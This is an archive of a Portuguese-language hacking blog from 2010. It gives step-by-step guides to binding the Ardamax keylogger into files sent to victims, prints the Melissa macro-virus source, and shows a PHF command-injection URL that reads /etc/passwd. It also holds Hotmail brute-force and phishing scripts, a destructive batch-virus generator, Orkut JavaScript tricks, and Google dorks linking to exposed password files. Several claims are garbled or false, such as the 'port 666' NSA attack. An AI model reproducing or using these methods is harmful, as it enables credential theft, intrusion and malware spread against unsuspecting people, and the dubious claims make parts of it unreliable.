sábado, 6 de novembro de 2010

hackeando pelo kaylogger

Append keylogger egine to file or another applition escolha o aquivo que voce deseja contaminar e avançar 4- deixa todas opção ativa e avançar 5- Enable e escolhe um senha 6- avançar deixa como está 7- avançar deixa como está 8- marque opção send logs every e avançar 9- coloque seu email send to e repete ele em send fron e clica na opçao testar 9- deixa todas opção ativa e avançar 10- avançar deixa como está 11- avançar concluir Pronto! Agora é só enviar... Veja os resultados: ">
O Ardamax Keylogger e uma ferramenta hacker, portanto pelos Antivirus é considerado uma ameaça (Vírus), para utilizar o Ardamax Keylogger é so você desabilitar todos programa de Proteção que você tenha instalado em sua Maquina.

Ardamax Tá awe o link para Download

http://rapidshare.com/files/58009304/setup_akl.zip?killcode=18039718543599190114
==========================================================

Instale o Ardamax Keylogger 2.8.
Vá em Enter Registration Code e adicione o serial:

Name:DarkBoard - Serial:SGTPSQOBHFMVROR

Agora Vamos Criar O Serve
Depois de instalado, devemos agora criar uma Instalador Remoto, para que sejam enviados os logs para seu e-mail.

Depois configure um e-mail que tenha smtp como bol e yahoo por exemplo...
E clique em test, tem que aparecer a seguinte imagem:

(The ardamax keylogger test e-mail delivery has been completed succesfully.
Check your maibox. awe de OK )

É recomendavel que você coloque para ele tirar PrintScreen de 1 em 1 hora para não "pesar".
Depois escolho o local para ser salvo e está pronto seu install.

Como fazer o aquivo pra mandar pra vitima

1- Depois vai em remote installation
2- Avançar
3- Marque a opção >  Append keylogger egine to file or another applition escolha o aquivo que voce deseja contaminar e avançar
4- deixa todas opção ativa e avançar
5- Enable e escolhe um senha
6- avançar deixa como está
7- avançar deixa como está
8- marque opção send logs every e avançar
9- coloque seu email send to e repete ele em send fron e clica na opçao testar 9- deixa todas opção ativa e avançar
10- avançar deixa como está
11- avançar
concluir
Pronto! Agora é só enviar... Veja os resultados:

Camuflar links em textos ou imagens

método 1
[­link=LINK DO SITE]SEU TEXTO[­/link]
*Para camuflar link em textos.
———————————————————————————————-
[­link=LINK DO SITE]<img src=”LINK DA Imagem“>[­/link]
*Para camuflar link em imagens.
Método 2
<a href=”LINK DO SITE“>TEXTO</a>
*Para camuflar link em textos.
———————————————————————————————-
<a href=”LINK DO SITE“><img src=”LINK DA Imagem“></a>
*Para camuflar link em imagens.

Coisas que o google não conta

Axei um tutorial ond o google serve para td
aprenda como pesquizar mais rapidamente fazer pesquizas avançadas
como axar nomes de donos de sites
curriculos e muito mais
link para download do tutorial


dowload:
http://www.megaupload.com/?d=6CY9BATB

Criando o vírus Melissa

Abra o Bloco de Notas e Cole o Código a baixo Salva com o nome Melissa.vbs
Um conselho naum vá achando que o .VBS é igual ao .BAT não então nem teste se não quiser ver a desgraça no seu PC
Olha é aconselhavél que você desative seu antivirus se não ele não vai deixar você fazer ele. É old mais é legal.
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “”
Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1):
Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”,
“HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo”
Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” &
Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t
show anyone else Wink”
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”

Esse virus faz com que o PC da vitima fique completamente louco
Não faça o teste no seu PC,
Não seja Noob

Deixando o seu SERVER indetectável

Nesse Ebook, contem várias formas atualizadas para deixar o seu SERVER indetectável, ele está em espanhol (é melhor que inglês ).. Mas é bem facil de entender os processos a serem feitos, pois ele está todo ilustrado..
Façam bom proveito.


http://w14.easy-share.com/1702019562.html

Faça o Windows dizer a você qual é a senha do Usuário

dowload:
http://w13.easy-share.com/1701752382.html

Mais um super pacotão Hacker, material excelente!

Mais um super pacotão Hacker, material excelente!

O pacote contem:
- Administrator Password Guessing
- Performing Automated Password Guessing
- Legion
- NTInfoScan
- Defending Against Password Guessing
- Monitoring Event Viewer Logs
- VisualLast
- Eavesdroppin on Network Password Exchange
- Hacking Tool: L0phtCrack
- Hacking Tool: KerbCrack
- Privilege Escalation
- Hacking Tool: GetAdmin
- Hacking Tool: hk
- Manual Password Cracking Algorithm
- Automatic Password Cracking Algorithm
- Password Types
- Types of Password Attacks
- Dictionary AttackageHide
- Hacking Tool: MP
- Brute Force Attack
- Distributed Brute Force Attack
- Password Change Interval
- Hybrid Attack
- Cracking Windows 2000 Passwords
- Retrieving the SAM file
- Redirecting SMB Logon to the Attacker
- SMB Redirection
- Hacking Tool: SMBRelay
- Hacking Tool: SMBRelay2
- SMBRelay Man-in-the-Middle (MITM)
- SMBRelay MITM Countermeasures
- Hacking Tool: SMBGrinder
- Hacking Tool: SMBDie
- Hacking Tool: NBTDeputy
- NetBIOS DoS Attack
- Hacking Tool: nbname
- Hacking Tool: John the Ripper
- LanManager Hash
- Password Cracking Countermeasures
- Keystroke Logger
- Hacking Tool: Spector
- AntiSpector
- Hacking Tool: eBlaster
- Hacking Tool: SpyAnywhere
- Hacking Tool: IKS Software Logger
- Hardware Tool: Hardware Key Logger
- Hacking Tool: Rootkit
- Planting Rootkit on Windows 2000 Machine
- rootkit embedded TCP/IP Stack
- Rootkit Countermeasures
- MD5 Checksum utility
- Tripwire
- Covering Tracks
- Disabling Auditing
- Auditpol
- Clearing the Event Log
- Hacking Tool: Elslave
- Hacking Tool: Winzapper
- Hacking Tool: Evidence Eliminator
- Hidding Files
- NTFS File Streaming
- Hacking Tool: makestrm
- NTFS Streams Countermeasures
- LNS
- Steganography
- Hacking Tool: Im3Stego
- Hacking Tool: Snow
- Hacking Tool: Camera/Shy
- Steganography Detection
- StegDetect
- Encrypted File System
- Hacking Tool: dskprobe
- Hacking Tool: EFSView
Tamanho: 150MB
Download:
 
parte 1:http://w16.easy-share.com/1700006687.html

Unsercure – Descubra Senhas de E-mail’s

http://w17.easy-share.com/1700663902.html

Vírus nunca mais

Crie uma conta de usuário limitada (tem que ser limitada!).
Para criar uma conta: Iniciar»Painel de Controle»Contas de usuário»Criar uma nova conta. Escolha o nome do seu novo usuário.
*Note: Crie também uma senha para todos os usuários, isso melhora também a segurança!
Pronto! Agora navegue na internet usando esse usuário!
Contras:
Você não poderá instalar programas nesta conta, no caso terá que sair e entrar na conta de privilégio ilimitado ou na conta de Administrador, mais tem uma saída!
Clique em cima do .exe e clique em executar como… pronto ai é só escolher qual o usuário tem o privilegio de instalar, digite a senha.

EXPLICAÇÃO:
Pois com uma conta de usuário limitada, você não tem privilégios de copiar nada para o driver c:\.
Paralelamente os vírus ou spy, entre outros, não terão como entrar em seu hd.

Ver as comunidades que algum Perfil é dono

Copie o código abaixo:

javascript:if(location.href.match(/Main/i)){gid=window.orkutFrame.document.body.innerHTML.match(/medium\/.*\/(.*)\/ln\.jpg/i)[1];location=”/UniversalSearch?searchFor=C&q=”+gid;}else{gid=document.body.innerHTML.match(/medium\/.*\/(.*)\/ln\.jpg/i)[1];location=”/UniversalSearch?searchFor=C&q=”+gid;}void(0);

Vai no perfil da pessoa que você quer saber as comunidades, cola o código na barra de endereço (onde digita www) e aperte Enter.
codigo feito por •PSICO•

Ver camera de segurança pelo google

Vou explicar como faz…..!! >abra o google http://www.google.com.br/
2º>copie e cole um desses \/
inurl:ViewerFrame?Mode=”
inurl:MUltiCameraFrame:?Mode=”
inurl:view/index.shtml”
3º>clike no link que tah escrito “estou com sorte”
e prontu eh muitu legal mesmo
espero que gostem!!!

Google hacks

Muito bom utilitário para varrer a interne em busca de arquivos, desde arquivos de áudio, e-Books, seriais, mp3, etc...^^

dowload:
http://googlehacks.googlecode.com/files/Google%20Hacks%201.6.zip

Ardamax keylogger 2.9

Ardamax keylogger 2.9


http://www.ardamax.com/downloads/setup_akl.exe


Grave tudo o que for digitado no computador, e um exelente programa para roubar senhas das pessoas

Pegar Ip pelo orkut

1ªFaça o download desse arquivo:
2ª entre no www.110mb.com e crie uma conta lá e entre nela, é claro
3ªVai em “Upload files” clique em procurar e selecione o arquivo que vc baixou
4ªClique com o botão direito do mouse em “IP.PHP” e selecione “Copiar link”
5ª<embed src=”Cole aqui“></embed>
Não tire as ” (aspas)
6ªMande um scrap contendo somente o codigo acima e ao entrar, o IP da pessoa irá para “IP.TXT” que se criará automaticamente no 110mb.
obs:Só dá pra enviar pros seus amigos do orkut

terça-feira, 19 de outubro de 2010

Invasao por IP

1º- Certifique-se de que você possui este programa: nbtstat.

2º- Vá ao Prompt do MS-DOS.
3º- Digite: nbtstat -a o IP do cara que você quer invadir
4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela.
Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de
certos caras por causa disso então não se entusiasme tanto pois só da para invadir
aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)
5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve
pegar o nome do negócio que estiver com <03> atrás do nome.
6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios
dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela
forma que eu digitei)
7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de
seu PC.
8º- V
á em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "O
K"
9º- Pr
onto! Você invadiu por IP
!
1
0º- Conselho : Nunca apague nem modifique NADA somente fuce bastante nas coisas
do lammaH e se achar algo interessante pega para você.
OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windows\sytem para que se alguem tente te nukar ou invadir não consiga... ; pois bem você vai ter que renomear o seu arquivo senão não da para invadir

Ataque pela porta 666

Ataque pela porta 666
O que é isto ? Bom , a port 666 é uma port que só poderia ser usada pela Governo
americano & NSA , tanto que eles comunicam isto quando você vaise conectar pela
port "Esta port é somente para uso da NSA e Governo Americano" . Bom , se conectar
por ela não nada dificil , mas precisa de alguns ajustes , é mais uma invasão pra você
pegar coisas na casa do amigo com ele sabendo .
O que você precisa :
Você precisa de um programa chamado Aabout (htp://www.dolphinsys.com) e pegue este programa . Você precisa de um programa para acessar Telnet (OHHH). Para quem não sabe este programa fica no diretório do windows.(Em windows).>
Pronto já tenho tudo e agora :
Agora você deve , ou pelo ICQ , ou pelo telefone , ou por chat , contactar o seu amigo
, e
le tamm deve ter estas duas ferramentas , depois que você contactar ele , vocês
dois de
vem executar o programa Aabout . Depois que você executar e ele tamm . É
s
ó abrir a Telnet , e colocar como host o ip dinâmico , pode ser , do cara , e se
c
onectar a port 666 e o login a palavra gr! (Não é só gr é G R ! , o ponto de
e
xclamação deve ficar). Pronto você estara em um prompt , agora é só dar um dir , e
voc
ê tem TOTAL controle sobre o computador do cara , tanto controle que você pode
c
hegar a poder dar FORMAT C: , por isso , só faça isto com amigos

Cracker de senhas Hydra agora sob licença GPL3

Na semana passada o grupo Hacker THC (The Hackers Choice), lançou uma versão do cracker Hydra, que esta sob a licença GPL3 (General Public License).binario
O Hydra é um software usado para crackear senhas por meio de dicionário.
O processo de utilização dessa ferramenta é até simples, basta você criar um arquivo de texto com diversas senhas, ou até mesmo baixar dicionários de senhas prontos (existem muitosssss na internet), e usa-los junto com o Hydra, para que dessa forma, o Hydra tente senha por senha até conseguir acesso a conta alvo.
Dentre os protocolos que o Hydra aceita estão: telnet, ftp, imap, icq, http, https, rsh, smp,teamspeak, dentre outros.
Vocês podem baixar ou obter maiores informações sobre o Hydra no
site do progeto-http://freeworld.thc.org/thc-hydra/

Man in the Mobile o novo ataque dos crackers

02/10/2010 Autor: Paulo Tacio Assine nosso Feed RSS 5 Comentários
man in the mobileOs crackers estão usando uma nova técnica de ataque, que é ligada a tão conhecida botnet ZeuS.
Esse novo ataque é composto por um malware para telefones celulares, que é capaz de capturar mensagens SMS das vítimas. O objetivo é quebrar a autenticação oferecida por alguns bancos, para clientes que fazem transações, consultas ou pagamentos via celular.
Essa nova técnica recebeu o nome de Man in the mobile, que é um trocadilho com a técnica man-in-the-middle (homem ao meio).
O ataque começa com engenharia social, a rede ZeuS faz com que o PC da vítima acesse um site falso, para capturar o numero de telefone e o modelo do celular. O próximo passo é convencer o usuário de que ele deve instalar uma ferramenta (malware) para autenticações em duas vias, aonde o usuário entra com a senha em seu Internet Banking e recebe um SMS do banco com um código para ser digitado, esse processo é bem comum entre os bancos que oferecem esse serviço. Após a instalação do malware, na próxima vez que a vítima acessar o Internet Banking pelo celular, o SMS com o código de segurança, será enviado para o Cracker, dessa forma ele poderá acessar a conta bancária da vitima.
O diferencial dessa técnica para as mais tradicionais, é que o cracker consegue ter acesso a conta bancária da vítima, mesmo quando ela não esta acessando o site do banco.

Revista Mundo Dos Hackers.pdf

Revista Mundo Dos Hackers.pdf
http://www.mandamais.com.br/download/2vlg2462010193254

segunda-feira, 18 de outubro de 2010

Fábrica de Vírus 1.4


Ferramenta para gerar vírus em .bat que tem as funções abaixo:

VIRUS DE DESTRUIÇÃO:

1 - Criar VIRUS Que Deleta a Pasta Do Windows
2 - Criar VIRUS Que Exclui Todas as DLL'S Do System32
3 - Criar VIRUS Que Exclui o Explorer.exe
4 - Criar VIRUS Que Exclui o Regedit.exe
5 - Criar VIRUS Que Deleta Tudo Que Nao Esta Sendo Usado

VIRUS DE IRRITAÇÃO:

6 - Criar VIRUS Que Desliga o Computador
7 - Criar VIRUS De Sacanagem Para Abrir Programa Ou Site Simultaneamente
8 - Criar VIRUS Que Cria Quantas Pastas Quiser No Desktop
9 - Criar VIRUS Que Abre Infinitas Mensagens De Alerta Com Sua Mensagem

COISAS INOFENCIVAS:

10 - Criar REGISTRO Que Muda o Nome Da Lixeira
11 - Criar REGISTRO Que Muda o Titulo Do Internet Explorer
12 - Criar Falso VIRUS Para Enganar Seus Amigos
13 - Criar VIRUS Que Emite Bipes Sem Parar

Tamanho: 458 KB
Servidor: Easy-Share


Faça As Pessoas entrar na sua comu sem saber


Divulgue por ai no Orkut a fora o seguinte código utilizando de uma boa engenharia social, lembrando que tem que pedir para as pessoas permitirem as janelas popups.Se quiser colocar mais que uma comunidade coloque , entre os numeros.
javascript:i=0;cmm=['4'];a =window.orkutFrame.document.forms[1]; a.target = 'f'; setInterval("i++; a.action = 'CommunityJoin.aspx?Action.join&cmm=' +cmm[i%cmm.length]; a.submit() ",999); void(0)
Mas onde tem o numero 4 ( em vermelho) substitua pelo numero da sua cmm.
O numero da cmm é a parte destacada igual semelhante ao link abaixo.
http://www.orkut.com.br/Main#Community.aspx?cmm=4

Pegar IP em MSN

Use o script para Messenger Plus a segui:
Ele detecta o IP de todas as pessoas que tc com você.

Strings malignas do Google

Entre no www.google.com.br
Onde vc coloca pra buscar sites e etc... vc coloca alguma string tipo:
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
vcs poderaumate mesmopastas de acesso root
http://64.233.167.104/search?q=cache:7E-Hf7gzvMYJ:felix.unife.it/Root/+%22index+of/root%22&hl=pt-BR&ct=clnk&cd=1&gl=br
nuss o google continua do jeito que gosto admin
http://64.233.167.104/search?q=cache:n538lfFtfRcJ:www.conass.org.br/admin/arquivos/+%22index+of/admin%22&hl=pt-BR&ct=clnk&cd=1&gl=br
http://64.233.167.104/search?q=cache:504ifu-a1f0J:www.sismod.com.br/Admin/+%22index+of/admin%22&hl=pt-BR&ct=clnk&cd=3&gl=br
http://www.blogg.org/admin/kietu/media/
http://www.cimar.ucr.ac.cr/administrador-pronostico/autentificacion/imagenes/
http://www.intelicelsa.com/administrador/
http://perrodeaguas.net/administrador/funciones/
bem voltando senhas admin
http://72.14.205.104/search?q=cache:3XliNQ9qquwJ:trade.hamk.fi/wwwkurssi/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=7&gl=br
http://72.14.205.104/search?q=cache:wWNFjzDDF9MJ:www.bucks.edu/~fishg/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=8&gl=br
http://72.14.205.104/search?q=cache:IxP9AbvsyOEJ:www.21stcapital.com/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=15&gl=br
a busca dentro do google pra tais senhas
é esta :
inurl:administrators.pwd
pra quem conhece um pouco de home pages
alguns diretorios bem interessante
http://72.14.205.104/search?q=cache:9o1ckLLIE74J:support.apollo3.com/password/+%E2%80%9CIndex+of+/%E2%80%9D+%2Bpassword.txt&hl=pt-BR&ct=clnk&cd=2&gl=br
http://72.14.205.104/search?q=cache:7Y1Bydblz84J:homepages.cae.wisc.edu/~ece468/+%E2%80%9CIndex+of+/%E2%80%9D+%2Bpassword.txt&hl=pt-BR&ct=clnk&cd=3&gl=br

Hackeando Hotmail 1

Hackeando Hotmail

Este texto foi escrito em inglês (original) por SPONZOR . A versão traduzida para o português foi efetuada por HACKERSLIM
-----------------------------------------------------------------------------

-----------------------------------------------------------------------------
Existem várias maneiras par se hackear a Hotmail, mais aqui só coloquei as melhores. Se esses truques não funcionarem prof avor envie um email para christog@hem1.passagen.se (OBS: esse cara é americano manda o mail para ele em inglês tá) e eu lhe direi o que vc esta fazendo de errado ou se a hotmail mudou alguma coisa. Lembre-se de que essas informações são apenas para uso educacional e vc não pode culpar ninguém pelo problema causado por inglês. Apenas lembre-se de que ninguém gosta que os outros fiquem vendo sua account, ele ou ela podera ficar muito brabo...
Aqui estão os meus métodos favoritos
____
I_1_I - Hackeando a força bruta

a. Use o seu Telnet para se conectar a porta 110 (Servidor da Hotmail)
b. Digite USER e o username da vitíma
c. Digite PASS e tente um password
d. Repita isso até que vc tenha achado a password correta
!. Esta técnica é chamada de hackeando a força bruta e requer paciência. É melhor que tentar chutar as passwords na Home page da hotmail pq é mais rápida.
____
I_2_I - O melhor método

a. Consiga o username da vitíma ( Geralmente fica no campo de endereço )
b. Então digite " www.hotmail.com/cgi-bin/start/usernamedavitíma "
c. Vc entrou
!. Esta técnica só funciona se vc estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out
____
I_3_I - O método velho

a. Vá a Home page da Hotmail e consiga um acount (se vc já não possuir uma)
b. Dê um Log Out
c. Agora digite o username da vitíma
d. Olhe a origem do arquivo
e. Olhe a linha 50 vc devera encontrar "action=someadress"
d. Copie o endereço e coloque no campo de
e. Vc esta dentro
!. Tudo que vc vera que este é um grande procedimento e que a vitíma devera demorar bastante tempo para efetuar um Log Out
____
I_4_I - Outro método...

a. Vá a Home Page da Hotmail
b. Copie a origem do arquivo
c. Faça uma novo arquivo em HTML com o mesmo código só mude method=post para method=enter
d. "Veja" a página
e. No campo de endereço digite www.hotmail.com/ www.hotmail.com/ (pelo amor de deus não pressione enter)
f. Peça para vítima digitar sua senha e seu username
g. Olhe o campo do endereço. Vc deverá ver ...&password:something...
!. Este é o método que eu uso, pq ele te dá a passord. (A senha ficará na pasta de histórico do browser). Vou dar um exemplo deste método para vc ver como é : hem1.passagen.se/christog/index.htm. Boa sorte!
LEIA!
Os SysOps da hotmail mudaram o "sistema" então a vitíma deverá dar log out se vc já estiver dentro da conta dele/dela. Então não perca seu tempo
Este texto veio de http://hem1.passagen.se/christog/hotmail.htm lembre-se que esta é a versão V.2.0.. Mais ira chegar...

Alguns Metodos de se roubar msn!

Alguns Metodos de se roubar msn!
¹- Hackeando a força bruta
Use o seu Telnet para se conectar a porta 110 (Servidor da Hotmail)
Digite USER e o username da vitíma
Digite PASS e tente um password
Repita isso até que vc tenha achado a password correta
Esta técnica é chamada de hackeando a força bruta e requer paciência. É melhor que tentar chutar as passwords na Home page da hotmail pq é mais rápida.

² - O melhor método

Consiga o username da vitíma ( Geralmente fica no campo de endereço )
Então digite " www.hotmail.com/cgi-bin/start/usernamedavitíma "
Vc entrou
Esta técnica só funciona se vc estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out

³ - O método velho

Vá a Home page da Hotmail e consiga um acount (se vc já não possuir uma)
Dê um Log Out
Agora digite o username da vitíma
Olhe a origem do arquivo
Olhe a linha 50 vc devera encontrar "action=someadress"
Copie o endereço e coloque no campo de
Vc esta dentro
Tudo que vc vera que este é um grande procedimento e que a vitíma devera demorar bastante tempo para efetuar um Log Out

³+¹ - Outro método...

Vá a Home Page da Hotmail
Copie a origem do arquivo
Faça uma novo arquivo em HTML com o mesmo código só mude method=post para method=enter
"Veja" a página
No campo de endereço digite www.hotmail.com/ www.hotmail.com/ (pelo amor de deus não pressione enter)
Peça para vítima digitar sua senha e seu username
Olhe o campo do endereço. Vc deverá ver ...&password:something...
Este é o método que eu uso, pq ele te dá a passord. (A senha ficará na pasta de histórico do browser). Vou dar um exemplo deste método para vc ver como é : hem1.passagen.se/christog/index.htm.
Os SysOps da hotmail mudaram o "sistema" então a vitíma deverá dar log out se vc já estiver dentro da conta dele/dela. Então não perca seu tempo

ENGENHARIA SOCIAL PARA MSN




Material :
Site Fake PHP ou HTML. Hospedagem Um Bom Msn fake vitima (Otario ) =D
Fake_msn : Bom Dia! Otario : Opa (sei l� o que a vitima irra responder)
Fake_msn: O nosso sistema necessita que alguns usuarios recadastrem seus endere�o de e-mail do hotmail.com ou windowslive.com Otario : por que ?
Fake_msn : Nois estamos migrando para um servidor mais potente Otario : atah
Otario : Como faiz isso ? Fake_msn : Siga Minhas instru��es fake_msn : entre no link abaixo fake_msn : Http//seu.link.// voc� pode botar um site lix.in e dizer que o site � servidor lix
Otario : I agora ? fake_msn : Clique no bot�o continue Otaio : tah
fake_msn : digite seu login e senha atuais nos campo apresentado a direita. fake_msn : presione o bot�o recadastro fake_msn : aguarde abri uma pagina de login da Hotmail ou da windows Live
Otario : Terminei � agora ? fake_msn : Deixe me verificar fake_msn : seu e-mail foi recadstrado com sucesso =D Fake_msn : Obrigado pela Coopera��o qualquer duvida ou sugest�o envie um e-mail para (seu fake )
Otario : Vlw fake_msn : tchau
Dicas
para ter um msn fake entre nesse link

clique aqui
dai se pode secreve qualquer coisa tipo

suporte.recadastro@servidorhotmail sem o .
com

pagina Fake
 
 
Dowload:

Descobrindo Senha de Hotmail

Descobrindo Senha de Hotmail

Bom galera, resolvi fazer esse tutorial pois muita gente me procura para perguntar isso.
Para esse tutorial, vamos usar o Hotmail como Exemplo, mas todas as técnicas utilizadas aqui podem ser usadas para qualquer email e algumas até para o Orkut. É bom você saber que ninguém descobre a senha de um hotmail invadindo o servidor de email deles não.
Existe várias maneiras de se roubar/descobrir a senha de um Hotmail, vamos listar cada uma delas.

1º Método: Seja um Engenheiro Social

» Pergunta Secreta

Essa é a forma mais simples de se Roubar a senha de um Hotmail. Acho ultrapassado, mas tem muita gente que ainda consegue. Usando esse método, quanto mais você conhecer a vítima, melhor.
Bom, o que fazer? Entre em www.hotmail.com e clique em “esqueceu sua senha?
www.invasao.com.br
Complete o processo de redefinição de senha normalmente e clique em Continuar.
www.invasao.com.br
Selecione “Usar minhas informações de localização e minha resposta secreta para verificar minha identidade” e aparecerá a imagem seguinte.
www.invasao.com.br
Agora é que entra seu conhecimento sobre a Vítima, você vai tentar acertar a resposta para a Pergunta Secreta, como fazer isso?
Você pode descobrir isso de duas maneiras, uma é lendo o orkut da vítima INTEIRO, lá pode ter a resposta para a pergunta, se não tiver… adicione a vítima no MSN e utilize de Engenharia Social, conhecida lábia, até arrancar a resposta da vítima.
Caso você acerte a pergunta, você está com o email da vítima nas mãos, aparecerá uma nova página pedindo a nova senha, igual a quando criamos o email.

» Página Falsa

Um método ainda muito utilizado hoje, e que muitos caem é a Fake Page, em português: Página Falsa
Consiste em “clonar” a página de login do email cujo a vítima usa. Essa página pode ser o Hotmail, o Yahoo, o Orkut, ou até mesmo a página de Login de um jogo.
Você vai usar de Engenharia Social (mais uma vez) e fazer a vítima logar nessa página falsa. Quando ela logar, vai redirecionar para verdadeira página dando a idéia que ocorreu um “bug” ao logar, mas na verdade o login e senha foi enviado para o seu email.
Segue um tutorial do Fvox de fazer uma Página Falsa pelo FrontPage
http://www.forum-invasao.com.br/novo/viewtopic.php?t=13374
Procurando no Fórum ou no Google você poderá saber mais sobre Páginas Falsas.

2º Método: Capturando senha usando Programas

» Trojans

Um método simples que dar certo em muitos casos, é mandar um Trojan para vítima, onde você não apenas rouba sua senha mas obtém acesso completo ao computador. Arranje um Trojan indetectável pelos antivírus ou proteja um sever detectavel para deixa-lo indetectavel.
Mande para vítima, faça ela executar (usando Engenharia Social) e invada, ative a captura do que ele tecla e aguarde ela entrar no email que você quer roubar. Para adiantar o processo, você pode fazer inumeras coisas pra ele acessar o email, tais como:
  • Mandar um email pra ele e diz pra ele ir lá ver
  • Fazer ele cair do MSN e forçando-o a redigitar a senha
Ahh, isso vai depender da sua criatividade.

Keyloggers

Um keylogger, como um nome já diz, serve para capturar o que é digitado no teclado, você vai fazer a mesma coisa que fez com o trojan, mandar e fazer a vítima executar, dependendo do Keylogger, você pode ver o log na sua tela ao vivo quando você quiser, ou o log pode ser enviado por email.
Para fazer isso você vai precisar de um keylogger bom e indetectável, sugiro o Ardamax 2.9. (Clique aqui para ver o Tutorial do Ardamax Keylogger)
Se fizer tudo certo, é só esperar algum tempo e a senha vem pra você, você pode usar Engenharia Social para encurtar esse tempo.
PS: Se você for programador, melhor ainda, pois você irá fazer seus próprios Malwares, tendo mais chance assim de obter sucesso, pois com 95% de certeza, seu Malware vai está indetectavel dependendo da lógica que você usou.
Meus tutoriais sempre estarão abertos a críticas. Se acha que devo implementar/tirar/alterar alguma coisa, entre em contato comigo e mostre suas argumentações.
Echo 3 Itens
Administrador
 
  –

Hackerndo WEBSITES

1->INTRODUÇÃO
Por favor, saiba que hackear webpages é considerado lammer em muitas opiniões, e muito provavelmente NÃO vai te dar uma boa reputação. As pessoas sempre podem checar log's uma vez notificadas de hacking, e provavelmente o seu IP/Host pode vir à tona e no mínimo irão te processar pela lei de crimes no computador, e vc será condenado à alguns anos de prisão e terá de pagar uma BOA quantia de dinheiro. Então por favor tente não abusar do conhecimento em relação a esse assunto. Esse texto tem apenas a função de informar.

2->HACKEANDO FREE WEB PAGES
O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.
Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo... Consiga o MAXIMO de info que vc puder sobre ela.
Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.
Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.
Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mailsde perda de password, então eles fizeram uma pagina onde membros podem pegar suas password'z de volta. (http://www.geocities.com/help/pass_form.html).

3>HACKEANDO PAGES DE USUÁRIOS
Existem várias maneiras de hackear pages de usuários em um servidor. Eu vou tentar listar aqui o máximo de maneiras possíveis para tal, mas não espere muito em termos de informação DETALHADA.
Pegando as password's:
Beleza, suponha que vc encontrou uma page que vc quer hackear, e que esta page esteja num server em que vc não tenha acesso, e que esse servidor seja BASICO, segurança leve. Tudo bem vai.... segurança BEM LEVE! Não vou mentir... funciona melhor em sites SEM SEGURANÇA. hehehe
Nesse caso, pegar a passwd é bem fácil. Abra um telnet para o FTP do server anonimamente e olhe no diretório ETC. Pegue o arquivo chamado "passwd". Outra maneira de pega-las é achar o seu alvo, abrir um WWW-Browser e digitar:
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd DEPOIS do nome do servidor. Ex.:
http://www.vitima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
OBS: se vc não souber o que colocar no lugar de "vitima.com", SE MATE LAMMER!
